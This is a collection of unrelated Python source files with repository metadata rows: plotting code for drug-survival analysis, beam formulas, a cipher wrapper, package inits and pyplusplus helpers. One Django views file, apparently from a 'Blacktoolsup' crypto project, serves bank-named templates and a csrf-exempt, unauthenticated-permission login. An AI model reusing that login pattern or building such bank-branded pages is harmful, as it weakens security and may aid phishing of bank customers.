# # ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c="black")
# ax.text((x + x2) / 2, y + 1 * d, significance(p_v[i, 1]), ha='center', va='bottom', fontsize=12)
ax.legend((rects1["boxes"][0], rects2["boxes"][0]),
(model, model2), fontsize=20)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
check_and_mkdir(dirname + 'results/fig/')
fig.savefig(
dirname + 'results/fig/adjusted_survival_diff_boxplot-{}-{}-{}.png'.format(model, model2, contrl_type))
fig.savefig(
dirname + 'results/fig/adjusted_survival_diff_boxplot-{}-{}-{}.pdf'.format(model, model2, contrl_type))
plt.show()
# plt.clf()
plt.close()
def box_plot_ate_V2(cohort_dir_name, models=['LR', 'LSTM', 'MLP', 'LIGHTGBM'], contrl_type='random', dump=True):
dirname_list = []
df_all_list = []
data_list = []
for model in models:
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
df_all = pd.read_excel(dirname + 'results/summarized_IPTW_ATE_{}.xlsx'.format(model),
dtype={'drug': str},
sheet_name=None)
dirname_list.append(dirname)
df_all_list.append(df_all)
df = df_all[contrl_type]
# Only select drugs with selection criteria trial
# 1. minimum support set 10, may choose 20 later
# 2. p value < 0.05
idx = (df['support'] >= MIN_SUPPORT) & (df['pvalue-KM1-0_IPTW'] <= 0.05)
df_sort = df.loc[idx, :].sort_values(by=['mean-KM1-0_IPTW'], ascending=[False])
data = []
data_pvalue = []
if model == 'LR':
drug_list = df_sort['drug'].tolist()
drug_name_list = df_sort['drug_name'].tolist()
print('len(drug_list):', len(drug_list))
N = len(drug_list)
n_box = len(models)
drug_list2 = df_sort['drug'].tolist()
for drug in drug_list:
rdf = pd.read_excel(dirname + 'results/' + drug + '_results.xlsx')
if contrl_type != 'all':
idx_all = (rdf['ctrl_type'] == contrl_type)
else:
idx_all = (rdf['ctrl_type'].notna())
# Only select balanced trial
idx = idx_all & (rdf['n_unbalanced_feature_IPTW'] <= MAX_NO_UNBALANCED_FEATURE)
c = "KM1-0_IPTW" # "ATE_original", "ATE_IPTW", "KM1-0_original", "KM1-0_IPTW", 'HR_ori', 'HR_IPTW'
nv = rdf.loc[idx, c]
if drug in drug_list2:
data.append(np.array(rdf.loc[idx, c]) * 100)
else:
data.append(np.array([]))
data_list.append(data)
colors = ['#F65453', '#82A2D3', '#FAC200', 'purple']
fig, ax = plt.subplots(figsize=(18, 8))
width = 0.5 # the width of the bars
ind = np.arange(N) * width * (n_box + 1) # the x locations for the groups
sym = 'o'
# 'meanline':True,
box_kw = {"sym": sym, "widths": width - 0.04, "patch_artist": True, "notch": True,
'showmeans': True, # 'meanline':True,
"meanprops": dict(linestyle='--', linewidth=1, markeredgecolor='black', marker='^',
markerfacecolor="None")}
rects_list = []
for i in range(len(data_list)):
rects = plt.boxplot(data_list[i], positions=ind + i*width, **box_kw)
rects_list.append(rects)
def plot_strip(ind, data, color):
w = width - 0.15
swarm1 = pd.DataFrame([(ind[i], data[i][j]) for i in range(len(ind)) for j in range(len(data[i]))],
columns=['x', 'y'])
strip_rx = stats.uniform(-w / 2., w).rvs(len(swarm1))
# sns.stripplot(x='x', y='y', data=swarm1, color=".25", alpha=0.2, ax=ax)
plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=.6, c=color)
# plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=1, facecolors='none', edgecolors=color) # c=color) #,
# ticks = list(drug_name_list)
for i, bplot in enumerate(rects_list):
for patch in bplot['boxes']:
patch.set_facecolor(colors[i])
r, g, b, a = patch.get_facecolor()
patch.set_facecolor((r, g, b, .6))
# plt.setp(bplot['boxes'], color=color)
# plt.setp(bplot['whiskers'], color=color)
# plt.setp(bplot['caps'], color=color)
plt.setp(bplot['medians'], color='black')
for i in range(len(data_list)):
plot_strip(ind + i*width, data_list[i], colors[i])
# plt.ylim([0.5, 0.85])
ax.set_xticks(ind + width / 2)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(drug_name_list, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Adjusted survival difference %", fontsize=25)
plt.axhline(y=0., color='black', linestyle='--')
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
# for d in range(len(data_list)):
# data = data_list[d]
# for i in range(N):
# n1 = len(data[i])
# n2 = len(data_2[i])
# y1 = max(data_1[i]) * 1.02
# try:
# y2 = max(data_2[i]) * 1.02
# except:
# y2 = y1
# x1 = ind[i]
# x2 = ind[i] + width
# ax.text(x1, y1, str(n1), ha='center', va='bottom', fontsize=14)
# ax.text(x2, y2, str(n2), ha='center', va='bottom', fontsize=14)
ax.legend((rects["boxes"][0] for rects in rects_list),
(m if m != 'LIGHTGBM' else 'GBM' for m in models), fontsize=20)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
dirname = dirname_list[0]
check_and_mkdir(dirname + 'results/fig/')
fig.savefig(
dirname + 'results/fig/adjusted_survival_diff_boxplot-modelall-{}.png'.format( contrl_type))
fig.savefig(
dirname + 'results/fig/adjusted_survival_diff_boxplot-modelall-{}.pdf'.format( contrl_type))
plt.show()
plt.clf()
if __name__ == '__main__':
# check_drug_name_code()
# test bootstrap method
# rvs = stats.norm.rvs(loc=0, scale=10, size=(100, 1))
# # ci = bootstrap_mean_ci(rvs)
# # p, test_orig = bootstrap_mean_pvalue(rvs, expected_mean=0., B=1000)
#
# rvs2 = stats.norm.rvs(loc=0, scale=10, size=(100, 1))
# p, test_orig = bootstrap_mean_pvalue_2samples(rvs, rvs2)
with open(r'pickles/_gpi_ingredients_nameset_cnt.pkl', 'rb') as f:
# change later, move this file to pickles also
gpiing_names_cnt = pickle.load(f)
drug_name = {}
for key, val in gpiing_names_cnt.items():
drug_name[key] = '/'.join(val[0])
# drug_name[key] = min(val[0], key=len)
print('Using GPI vocabulary, len(drug_name) :', len(drug_name))
# shell_for_ml_marketscan_stats_exist(cohort_dir_name='save_cohort_all_loose', model='LR', niter=10)
# shell_for_ml_marketscan(cohort_dir_name='save_cohort_all_loose', model='LR', niter=50) # too slow to get --stats
# split_shell_file("shell_LR_save_cohort_all_loose_marketscan.sh", divide=4, skip_first=1)
#
# shell_for_ml_marketscan(cohort_dir_name='save_cohort_all_loose', model='LIGHTGBM', niter=50, stats=False)
# split_shell_file("shell_LIGHTGBM_save_cohort_all_loose_marketscan.sh", divide=4, skip_first=1)
shell_for_ml_marketscan(cohort_dir_name='save_cohort_all_loose', model='LSTM', niter=50, stats=False,
more_para='--epochs 10 --batch_size 128', selected=True)
split_shell_file("shell_LSTM_save_cohort_all_loose_marketscan.sh", divide=3, skip_first=1)
# shell_for_ml(cohort_dir_name='save_cohort_all_loose', model='LR', niter=50)
# shell_for_ml(cohort_dir_name='save_cohort_all_loose', model='LIGHTGBM', niter=50, stats=False)
# shell_for_ml(cohort_dir_name='save_cohort_all_loose', model='MLP', niter=50, stats=False)
# split_shell_file("shell_MLP_save_cohort_all_loose.sh", divide=4, skip_first=1)
# shell_for_ml(cohort_dir_name='save_cohort_all_loose', model='LSTM', niter=50, stats=False,
# more_para='--epochs 10 --batch_size 128')
# split_shell_file("shell_LSTM_save_cohort_all_loose.sh", divide=4, skip_first=1)
cohort_dir_name = 'save_cohort_all_loose'
model = 'LR' # 'MLP' # 'LR' #'LIGHTGBM' #'LR' #'LSTM'
# results_model_selection_for_ml(cohort_dir_name=cohort_dir_name, model=model, drug_name=drug_name, niter=50)
# results_model_selection_for_ml_step2(cohort_dir_name=cohort_dir_name, model=model, drug_name=drug_name)
# results_model_selection_for_ml_step2More(cohort_dir_name=cohort_dir_name, model=model, drug_name=drug_name)
# #
# results_ATE_for_ml(cohort_dir_name=cohort_dir_name, model=model, niter=50)
# results_ATE_for_ml_step2(cohort_dir_name=cohort_dir_name, model=model, drug_name=drug_name)
# results_ATE_for_ml_step3_finalInfo(cohort_dir_name, model)
# #
# # combine_ate_final_LR_with(cohort_dir_name, 'LSTM') # needs to compute lstm case first
# #
# # major plots from 3 methods
# bar_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='random')
# bar_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='atc')
# bar_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='all')
# # #
# box_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='random')
# box_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='atc')
# box_plot_model_selection(cohort_dir_name=cohort_dir_name, model=model, contrl_type='all')
# box_plot_ate(cohort_dir_name, model=model, model2='LR', contrl_type='all')
#
# # # ## all methods plots in appendix
# bar_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='random')
# bar_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='atc')
# bar_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='all')
# #
# box_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='random')
# box_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='atc')
# box_plot_model_selectionV2(cohort_dir_name=cohort_dir_name, model=model, contrl_type='all')
# box_plot_ate(cohort_dir_name, model=model, model2='MLP', contrl_type='random')
# box_plot_ate(cohort_dir_name, model=model, model2='MLP', contrl_type='atc')
# box_plot_ate(cohort_dir_name, model=model, model2='MLP', contrl_type='all')
# box_plot_ate(cohort_dir_name, model=model, model2='MLP', contrl_type='all')
# box_plot_ate(cohort_dir_name, model=model, model2='LIGHTGBM', contrl_type='all')
# box_plot_ate(cohort_dir_name, model=model, model2='LSTM', contrl_type='all')
#
# box_plot_ate(cohort_dir_name, model=model, model2='MLP', contrl_type='atc')
# box_plot_ate(cohort_dir_name, model=model, model2='LIGHTGBM', contrl_type='atc')
# box_plot_ate(cohort_dir_name, model=model, model2='LSTM', contrl_type='atc')
#
# box_plot_ate(cohort_dir_name, model=model, model2='MLP', contrl_type='random')
# box_plot_ate(cohort_dir_name, model=model, model2='LIGHTGBM', contrl_type='random')
# box_plot_ate(cohort_dir_name, model=model, model2='LSTM', contrl_type='random')
# box_plot_ate_V2(cohort_dir_name, models=['LR', 'LSTM', 'MLP', 'LIGHTGBM'], contrl_type='random')
# box_plot_ate_V2(cohort_dir_name, models=['LR', 'LSTM', 'MLP', 'LIGHTGBM'], contrl_type='atc')
# box_plot_ate_V2(cohort_dir_name, models=['LR', 'LSTM', 'MLP', 'LIGHTGBM'], contrl_type='all')
print('Done')
| 48.029796 | 157 | 0.576039 | 13,122 | 91,881 | 3.809785 | 0.050069 | 0.020883 | 0.030165 | 0.024484 | 0.863758 | 0.836394 | 0.81175 | 0.779945 | 0.743379 | 0.720015 | 0 | 0.032686 | 0.259455 | 91,881 | 1,912 | 158 | 48.054916 | 0.702037 | 0.214342 | 0 | 0.576983 | 0 | 0 | 0.18443 | 0.091887 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028771 | false | 0 | 0.01633 | 0.000778 | 0.070762 | 0.031104 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
10c45f51027411137b2c9730230dcbbe3f1e2a5e | 21 | py | Python | example_project/some_modules/third_modules/a116.py | Yuriy-Leonov/cython_imports_limit_issue | 2f9e7c02798fb52185dabfe6ce3811c439ca2839 | [
"MIT"
] | null | null | null | example_project/some_modules/third_modules/a116.py | Yuriy-Leonov/cython_imports_limit_issue | 2f9e7c02798fb52185dabfe6ce3811c439ca2839 | [
"MIT"
] | null | null | null | example_project/some_modules/third_modules/a116.py | Yuriy-Leonov/cython_imports_limit_issue | 2f9e7c02798fb52185dabfe6ce3811c439ca2839 | [
"MIT"
] | null | null | null | class A116:
pass
| 7 | 11 | 0.619048 | 3 | 21 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 0.333333 | 21 | 2 | 12 | 10.5 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
10d17f58ba1b1c70d4aef7e7914ceccef51ade98 | 1,038 | py | Python | server/beam/utilities/IFinder.py | tweakyllama/beam-app | 147bb6832c81e45b89566f58ea8dfe1dcded2078 | [
"MIT"
] | null | null | null | server/beam/utilities/IFinder.py | tweakyllama/beam-app | 147bb6832c81e45b89566f58ea8dfe1dcded2078 | [
"MIT"
] | null | null | null | server/beam/utilities/IFinder.py | tweakyllama/beam-app | 147bb6832c81e45b89566f58ea8dfe1dcded2078 | [
"MIT"
] | null | null | null | from numpy import pi
def rectangle(width, height):
return (width * height ** 3) / 12
def circle(radius):
return (pi * radius ** 4) / 4
def i_beam(total_width, total_height, bar_width, bar_height):
return rectangle(total_width, total_height) - rectangle(total_width - bar_width, total_height - 2 * bar_height)
def t_beam(total_width, total_height, bar_width, bar_height):
a1 = total_width * bar_height
a2 = bar_width * (total_height - bar_height)
y_bar = ((a1 * (total_height - bar_height / 2)) + (a2 * (total_height - bar_height) / 2)) / (a1 + a2)
I1 = rectangle(total_width, bar_height)
I2 = rectangle(bar_width, (total_height - bar_height))
# Parallel axis theorem
I1 += a1 * ((total_height - bar_height / 2) - y_bar) ** 2
I2 += a2 * ((total_height - bar_height) / 2 - y_bar) ** 2
return I1 + I2
def c_beam(total_width, total_height, bar_width, bar_height):
return rectangle(total_width, total_height) - rectangle(total_width - bar_width, total_height - 2 * bar_height)
| 30.529412 | 115 | 0.682081 | 154 | 1,038 | 4.285714 | 0.188312 | 0.216667 | 0.218182 | 0.181818 | 0.684848 | 0.684848 | 0.524242 | 0.524242 | 0.445455 | 0.381818 | 0 | 0.032491 | 0.199422 | 1,038 | 33 | 116 | 31.454545 | 0.761733 | 0.020231 | 0 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0 | 0.055556 | 0.222222 | 0.611111 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
10efee5e033d2a24bf49c842de5d3731d1910270 | 104 | py | Python | squawk/utils/__init__.py | daemon/squawk | df6443a200f8bfef7d5338d8577fc30eac4f49b9 | [
"MIT"
] | null | null | null | squawk/utils/__init__.py | daemon/squawk | df6443a200f8bfef7d5338d8577fc30eac4f49b9 | [
"MIT"
] | null | null | null | squawk/utils/__init__.py | daemon/squawk | df6443a200f8bfef7d5338d8577fc30eac4f49b9 | [
"MIT"
] | null | null | null | from .concurrency import *
from .dataclass import *
from .torch_utils import *
from .workspace import *
| 20.8 | 26 | 0.769231 | 13 | 104 | 6.076923 | 0.538462 | 0.379747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 104 | 4 | 27 | 26 | 0.897727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8016412d8b9604fc4484037e24f8879490f48637 | 2,317 | py | Python | Cryptotrade/bitcotrade/views.py | joseph-njogu/Blacktoolsup | d2b454a194396b20e1d5411cf6da7605adb20c5a | [
"MIT"
] | null | null | null | Cryptotrade/bitcotrade/views.py | joseph-njogu/Blacktoolsup | d2b454a194396b20e1d5411cf6da7605adb20c5a | [
"MIT"
] | null | null | null | Cryptotrade/bitcotrade/views.py | joseph-njogu/Blacktoolsup | d2b454a194396b20e1d5411cf6da7605adb20c5a | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect
from django.contrib.auth import authenticate
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from rest_framework.authtoken.models import Token
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import AllowAny
from rest_framework.status import (
HTTP_400_BAD_REQUEST,
HTTP_404_NOT_FOUND,
HTTP_200_OK
)
from rest_framework.response import Response
# def index(request):
# return render(request, 'index.html')
@csrf_exempt
# post method
@api_view(["POST"])
@permission_classes((AllowAny,))
def login(request):
username = request.data.get("username")
password = request.data.get("password")
if username is None or password is None:
return Response({'error': 'Please provide both username and password'},
status=HTTP_400_BAD_REQUEST)
user = authenticate(username=username, password=password)
if not user:
return Response({'error': 'Invalid Credentials'},
status=HTTP_404_NOT_FOUND)
token, _ = Token.objects.get_or_create(user=user)
return Response({'token': token.key},
status=HTTP_200_OK)
if user is not None:
login(request,user)
return redirect(dashboard)
def woodforest(request):
return render(request, 'woodforest.html')
def dashboard(request):
return render(request, 'dashboard.html')
def invoice(request):
return render(request, 'invoice.html')
def huntington(request):
return render(request, 'huntington.html')
def barclays(request):
return render(request, 'barclays.html')
def bbt(request):
return render(request, 'bbt.html')
def bbva(request):
return render(request, 'bbva.html')
def chase(request):
return render(request, 'chase.html')
def citi(request):
return render(request, 'citi.html')
def nfcu(request):
return render(request, 'nfcu.html')
def pnc(request):
return render(request, 'pnc.html')
def rbc(request):
return render(request, 'rbc.html')
def scotia(request):
return render(request, 'scotia.html')
def suntrust(request):
return render(request, 'suntrust.html')
def logout(request):
return render(request, 'lockscreen.html')
| 27.583333 | 79 | 0.718602 | 292 | 2,317 | 5.59589 | 0.267123 | 0.127295 | 0.186047 | 0.25459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00939 | 0.172637 | 2,317 | 83 | 80 | 27.915663 | 0.842984 | 0.02978 | 0 | 0 | 0 | 0 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.258065 | false | 0.064516 | 0.145161 | 0.241935 | 0.709677 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
8030fec0dcd3f5486d86356268545e2c1dcec1d8 | 132 | py | Python | dnplab/math/__init__.py | DNPLab/dnpLab | 79dc347a239b4e41dc2c41342744414405b9ab33 | [
"MIT"
] | null | null | null | dnplab/math/__init__.py | DNPLab/dnpLab | 79dc347a239b4e41dc2c41342744414405b9ab33 | [
"MIT"
] | 1 | 2020-09-03T22:07:15.000Z | 2020-09-03T22:07:15.000Z | dnplab/math/__init__.py | DNPLab/dnpLab | 79dc347a239b4e41dc2c41342744414405b9ab33 | [
"MIT"
] | null | null | null | """Modules to constructs numpy arrays from input arguments"""
from . import lineshape
from . import window
from . import relaxation
| 26.4 | 61 | 0.780303 | 17 | 132 | 6.058824 | 0.705882 | 0.291262 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151515 | 132 | 4 | 62 | 33 | 0.919643 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8048e5a8e31f5c0f97a71448e130f57106efbf9e | 233 | py | Python | Transposition/DoubleTransposition.py | AVM-Martin/CTF-EncryptionAlgorithm | 1226f3db8d3358e1f50ae2f2722f66dee281507a | [
"WTFPL"
] | null | null | null | Transposition/DoubleTransposition.py | AVM-Martin/CTF-EncryptionAlgorithm | 1226f3db8d3358e1f50ae2f2722f66dee281507a | [
"WTFPL"
] | null | null | null | Transposition/DoubleTransposition.py | AVM-Martin/CTF-EncryptionAlgorithm | 1226f3db8d3358e1f50ae2f2722f66dee281507a | [
"WTFPL"
] | null | null | null | from Transposition import Transposition
class DoubleTransposition(Transposition):
def encrypt(self, text):
return super().encrypt(super().encrypt(text))
def decrypt(self, text):
return super().decrypt(super().decrypt(text))
| 23.3 | 47 | 0.759657 | 27 | 233 | 6.555556 | 0.444444 | 0.090395 | 0.158192 | 0.214689 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107296 | 233 | 9 | 48 | 25.888889 | 0.850962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.166667 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
805972173b0984bb2412e41a28b8ae6f3a6db802 | 36 | py | Python | pyplan/pyplan/__init__.py | jorgedouglas71/pyplan-ide | 5ad0e4a2592b5f2716ff680018f717c65de140f5 | [
"MIT"
] | 17 | 2019-12-04T19:22:19.000Z | 2021-07-28T11:17:05.000Z | pyplan/pyplan/__init__.py | jorgedouglas71/pyplan-ide | 5ad0e4a2592b5f2716ff680018f717c65de140f5 | [
"MIT"
] | 9 | 2019-12-13T15:34:43.000Z | 2022-02-10T11:43:00.000Z | pyplan/pyplan/__init__.py | jorgedouglas71/pyplan-ide | 5ad0e4a2592b5f2716ff680018f717c65de140f5 | [
"MIT"
] | 5 | 2019-12-04T15:57:06.000Z | 2021-08-20T19:59:26.000Z | from .config import PyplanAppConfig
| 18 | 35 | 0.861111 | 4 | 36 | 7.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
33a120dab1202b11315a87500ceac45606194b49 | 2,339 | py | Python | pyplusplus/function_transformers/__init__.py | electronicvisions/pyplusplus | 4d88bb8754d22654a61202ae8adc222807953e38 | [
"BSL-1.0"
] | 5 | 2021-01-29T19:54:34.000Z | 2022-03-23T11:16:37.000Z | pyplusplus/function_transformers/__init__.py | electronicvisions/pyplusplus | 4d88bb8754d22654a61202ae8adc222807953e38 | [
"BSL-1.0"
] | null | null | null | pyplusplus/function_transformers/__init__.py | electronicvisions/pyplusplus | 4d88bb8754d22654a61202ae8adc222807953e38 | [
"BSL-1.0"
] | 3 | 2016-04-06T15:16:49.000Z | 2019-01-15T07:08:29.000Z | # Helper classes for wrapper function creation
"""This sub-package implements function transformation functionality"""
from .transformer import transformer_t
from . import transformers
from .function_transformation import function_transformation_t
def output( *args, **keywd ):
def creator( function ):
return transformers.output_t( function, *args, **keywd )
return creator
def input( *args, **keywd ):
def creator( function ):
return transformers.input_t( function, *args, **keywd )
return creator
def inout( *args, **keywd ):
def creator( function ):
return transformers.inout_t( function, *args, **keywd )
return creator
def input_static_array( *args, **keywd ):
def creator( function ):
return transformers.input_static_array_t( function, *args, **keywd )
return creator
def output_static_array( *args, **keywd ):
def creator( function ):
return transformers.output_static_array_t( function, *args, **keywd )
return creator
def inout_static_array( *args, **keywd ):
def creator( function ):
return transformers.inout_static_array_t( function, *args, **keywd )
return creator
def input_static_matrix( *args, **keywd ):
def creator( function ):
return transformers.input_static_matrix_t( function, *args, **keywd )
return creator
def output_static_matrix( *args, **keywd ):
def creator( function ):
return transformers.output_static_matrix_t( function, *args, **keywd )
return creator
def inout_static_matrix( *args, **keywd ):
def creator( function ):
return transformers.inout_static_matrix_t( function, *args, **keywd )
return creator
def modify_type( *args, **keywd ):
def creator( function ):
return transformers.type_modifier_t( function, *args, **keywd )
return creator
def input_c_buffer( *args, **keywd ):
def creator( function ):
return transformers.input_c_buffer_t( function, *args, **keywd )
return creator
def transfer_ownership( *args, **keywd ):
def creator( function ):
return transformers.transfer_ownership_t( function, *args, **keywd )
return creator
def from_address( *args, **keywd ):
def creator( function ):
return transformers.from_address_t( function, *args, **keywd )
return creator
| 31.186667 | 78 | 0.693459 | 270 | 2,339 | 5.818519 | 0.133333 | 0.14895 | 0.0993 | 0.157225 | 0.80331 | 0.80331 | 0.783577 | 0.65436 | 0.451941 | 0 | 0 | 0 | 0.201796 | 2,339 | 74 | 79 | 31.608108 | 0.841457 | 0.047456 | 0 | 0.472727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.472727 | false | 0 | 0.054545 | 0.236364 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
33a261e2d0bb38f8dd4c6aca4e0ff6e32939453a | 57 | py | Python | src/deep_dialog/usersims/__init__.py | sujoung/debuggedDDQ | 0b2751b063e28030dff6bf115ae2c4dd2cf7a0cf | [
"MIT"
] | null | null | null | src/deep_dialog/usersims/__init__.py | sujoung/debuggedDDQ | 0b2751b063e28030dff6bf115ae2c4dd2cf7a0cf | [
"MIT"
] | null | null | null | src/deep_dialog/usersims/__init__.py | sujoung/debuggedDDQ | 0b2751b063e28030dff6bf115ae2c4dd2cf7a0cf | [
"MIT"
] | null | null | null | from .usersim_rule import *
from .usersim_model import *
| 19 | 28 | 0.789474 | 8 | 57 | 5.375 | 0.625 | 0.511628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 57 | 2 | 29 | 28.5 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
33a6c3f105057161672a4fe6d209ec91010948ab | 166 | py | Python | exoastrology/__init__.py | emilyhunt/exoplanet-astrology | ca9356c096d8456ae0cdd2f4514f144ec8f57136 | [
"BSD-3-Clause"
] | 2 | 2022-01-24T22:12:25.000Z | 2022-02-02T22:21:24.000Z | exoastrology/__init__.py | emilyhunt/exoplanet-astrology | ca9356c096d8456ae0cdd2f4514f144ec8f57136 | [
"BSD-3-Clause"
] | null | null | null | exoastrology/__init__.py | emilyhunt/exoplanet-astrology | ca9356c096d8456ae0cdd2f4514f144ec8f57136 | [
"BSD-3-Clause"
] | null | null | null | from .horoscope import generate, generate_initial_tweet
from .twitter import start_client, post_thread, post_horoscope, run_horoscopes
from .util import split_string
| 41.5 | 78 | 0.861446 | 23 | 166 | 5.913043 | 0.695652 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096386 | 166 | 3 | 79 | 55.333333 | 0.906667 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
